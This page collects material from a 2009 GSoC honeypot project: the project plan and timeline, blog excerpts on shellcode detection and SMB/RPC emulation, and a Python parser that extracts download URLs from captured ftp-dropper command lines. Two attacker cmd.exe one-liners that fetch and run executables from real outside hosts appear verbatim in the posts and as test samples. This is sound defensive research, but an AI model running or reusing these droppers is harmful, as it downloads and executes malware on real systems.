GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots

Nepenthes is one of the leading low-interaction honeypots designed to automate the capture and analysis of malware. This project will be a next-generation development of low-interaction server honeypots, able to automatically and scalably detect known and unknown malware.

Mentor: Paul Baecher
Student: Markus Koetter
Deliverables:

  • low interaction honeypot
  • supporting ipv4, ipv6 and unix domain sockets
  • supporting tcp, udp and ssl/tls to serve and connect services
  • interfacing p0f to fingerprint incoming connections
  • embedding python to allow writing service protocols in a scripting language
  • using libemu to detect and emulate shellcode
  • downloading malware via the most common protocols

Timelines:
23.05.2009

  • start

16.06.2009

  • automake buildsystem works with library checks
  • networking core functionality works (tcp,udp,ssl,un)
  • privileged child works
  • fingerprinting incoming connections via p0f works
  • module loading works
  • events work
  • logging works

A simple protocol which can be connected to using netcat or openssl s_client via ipv4/6 proves these claims.

16.07.2009

  • python interface exists
  • provides a cli
  • can access the networking core
  • can emit and receive events
  • can load python scripts
  • examples how to use the scripting interface
  • the required parts of the protocol for an exploit taken from a public repository are implemented in python

A simple protocol written in python which can be connected to using netcat or openssl s_client via ipv4/6 is provided to prove these claims.

10.08.2009

  • thread-pool works
  • stream recording works
  • shellcode detection using libemu works
  • shellcode emulation using libemu works
  • compiles on linux&openbsd

An exploit taken from a public repository, run against the software, is detected and emulated.

24.08.2009

  • documentation improvements, homepage documents how to install and use the software


Iteolih: RPC vulnerability implementation party

The Dionaea honeypot got more and more mature during the last weeks. As Markus blogged in Iteolih: Miles and More the software is now able to detect shellcode via libemu and generates a nice shellcode profile out of this.

The SMB / DCERPC implementation also got fairly mature and is now able to cope with all packet types and also most caveats and differences of implementations in exploits. As I registered more and more RPC vulnerabilities in the module, it was definitely time to give libemu something to eat! :)

Iteolih: Miles and More

We got a new milestone due:
10.08.2009

  • thread-pool works
  • stream recording works
  • shellcode detection using libemu works
  • shellcode emulation using libemu works
  • compiles on linux&openbsd

An exploit taken from a public repository, run against the software, is detected and emulated.
To shorten things, basically all required points are hit with current svn.
So, given the time we just saved, some words about how it works.

Iteolih: malicious ftp services

Yesterday, I got an incomplete, but successful, attack on my honeypot; the attacker's remote code execution looked like this:

WinExec("cmd /c echo open 78.1.96.200 4871 > o&echo user 1 1 >> o &echo get msq16.exe >> o")
ExitThread(0)

As the part required to download the malware to the remote host was incomplete, I got curious and wanted a copy.

Iteolih: If you can't touch it ...

While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.

cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo user ik ik >> i &echo binary >> i &echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe
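Both this post and "malicious ftp services" above show the same dropper pattern: a chain of echo commands writes an ftp.exe script, then ftp -n -s: runs it and the fetched binary is executed. A honeypot never has to execute any of it; it can interpret the command line and fetch the file itself. The following parser is an added example for this page, not code from the Dionaea project or from either post. It splits the cmd.exe chain, reconstructs host, port, credentials and file names from the echo lines, records whether the script is actually handed to ftp.exe (which is exactly what the first sample is missing) and turns the result into ftp:// URLs. The two sample strings are copies of the command lines quoted on this page; the class and function names are my own.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Copies of the two command lines quoted in the posts above (constructed test input).
SAMPLE_INCOMPLETE = (
    "cmd /c echo open 78.1.96.200 4871 > o&echo user 1 1 >> o "
    "&echo get msq16.exe >> o"
)
SAMPLE_COMPLETE = (
    "cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo user ik ik >> i "
    "&echo binary >> i &echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe"
)


@dataclass
class FtpDropper:
    """What an 'echo ... > script & ftp -s:script' one-liner would do if executed."""
    host: Optional[str] = None
    port: int = 21                      # ftp.exe default when 'open' gives no port
    user: Optional[str] = None
    password: Optional[str] = None
    binary: bool = False
    files: List[str] = field(default_factory=list)
    script_name: Optional[str] = None   # file the echo lines are redirected into
    ftp_invoked: bool = False           # 'ftp -n -s:<script_name>' is present
    executed: List[str] = field(default_factory=list)  # programs run afterwards

    def missing(self) -> List[str]:
        """Steps that are absent, i.e. why the download would never happen."""
        gaps = []
        if not self.host:
            gaps.append("open")
        if not self.files:
            gaps.append("get")
        if not self.ftp_invoked:
            gaps.append("ftp -s:<script>")
        return gaps

    @property
    def complete(self) -> bool:
        return not self.missing()

    def urls(self) -> List[str]:
        """ftp:// URLs the honeypot can fetch itself instead of running ftp.exe."""
        if not self.host:
            return []
        auth = ""
        if self.user:
            auth = self.user + (f":{self.password}" if self.password else "") + "@"
        return [f"ftp://{auth}{self.host}:{self.port}/{f}" for f in self.files]


_CMD_PREFIX = re.compile(r"^\s*cmd(?:\.exe)?\s+/c\s+", re.IGNORECASE)
_ECHO_LINE = re.compile(r"^echo\s+(?P<cmd>.*?)\s*>>?\s*(?P<script>\S+)$", re.IGNORECASE)
_FTP_CALL = re.compile(r"^ftp(?:\.exe)?\s+(?P<opts>.*)$", re.IGNORECASE)


def _apply_ftp_command(d: FtpDropper, words: List[str]) -> None:
    """Interpret one line of the generated ftp.exe script."""
    if not words:
        return
    verb = words[0].lower()
    if verb == "open" and len(words) > 1:
        d.host = words[1]
        if len(words) > 2 and words[2].isdigit():
            d.port = int(words[2])
    elif verb == "user" and len(words) > 1:
        d.user = words[1]
        d.password = words[2] if len(words) > 2 else None
    elif verb in ("binary", "bin"):
        d.binary = True
    elif verb in ("get", "recv") and len(words) > 1:
        d.files.append(words[1])
    # 'quit', 'bye', 'prompt' etc. do not change what gets downloaded


def parse_ftp_dropper(cmdline: str) -> FtpDropper:
    """Reconstruct the intended download from a cmd.exe ftp-dropper one-liner."""
    d = FtpDropper()
    body = _CMD_PREFIX.sub("", cmdline)
    # cmd.exe runs '&'-separated commands in order; '&&' yields empty parts we skip.
    # Limitation: '&' inside quotes is not handled, the samples here use none.
    for part in body.split("&"):
        part = part.strip()
        if not part:
            continue
        m = _ECHO_LINE.match(part)
        if m:
            if d.script_name is None:
                d.script_name = m.group("script")
            if m.group("script") == d.script_name:
                _apply_ftp_command(d, m.group("cmd").split())
            continue
        m = _FTP_CALL.match(part)
        if m:
            s = re.search(r"-s:(\S+)", m.group("opts"))
            if s and s.group(1) == d.script_name:
                d.ftp_invoked = True
            continue
        # anything else is the attacker running what was just dropped
        d.executed.append(part.split()[0])
    return d


if __name__ == "__main__":
    for sample in (SAMPLE_INCOMPLETE, SAMPLE_COMPLETE):
        d = parse_ftp_dropper(sample)
        print(d.urls(), "complete" if d.complete else f"missing {d.missing()}")
```

For the first sample the parser reports the ftp -s: step as missing, which matches the observation in "malicious ftp services" that the attacker's script never started the download; the URL it extracts is still enough for the honeypot to fetch the file on its own.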

Iteolih: SMB/RPC efforts

During the last weeks I have been working on SMB and specifically DCERPC support for the Dionaea next generation low-interaction honeypot (buzz!).

SMB / CIFS is a huge protocol with several protocol versions and a lot of message types. The CIFS technical reference and the Implementing CIFS book have been constant companions for me since the beginning of the project.

Iteolih: Is this worth your time?

Hello,
due to the length of the whole term Improving the effectiveness of low interaction honeypots, I decided to use Iteolih as a unique abbreviation. Things are rolling for the project, writing code has started, and a basic homepage with instructions on how to compile/use it was created.
I even had the plan to write about it once or twice, finish something in the code, write about it. When I was done with the code, I got the idea, writing about it was not worth your time.

Iteolih: Python Benchmark

As the plan is to embed python as the scripting language into the honeypot, I ran a benchmark on a testsuite. The 'testsuite' is a c core which accepts connections and allows python to deal with the input. The protocol used for benchmarking is http; the service serves a non-static html page.
I tested

  • 2.6.2 (release26-maint, Apr 19 2009, 02:15:38)
  • 3.0.1+ (r301:69556, Apr 15 2009, 17:22:45)
  • 3.1a1+ (py3k, Mar 30 2009, 02:02:26)

To benchmark, I ran the apache benchmark tool ab
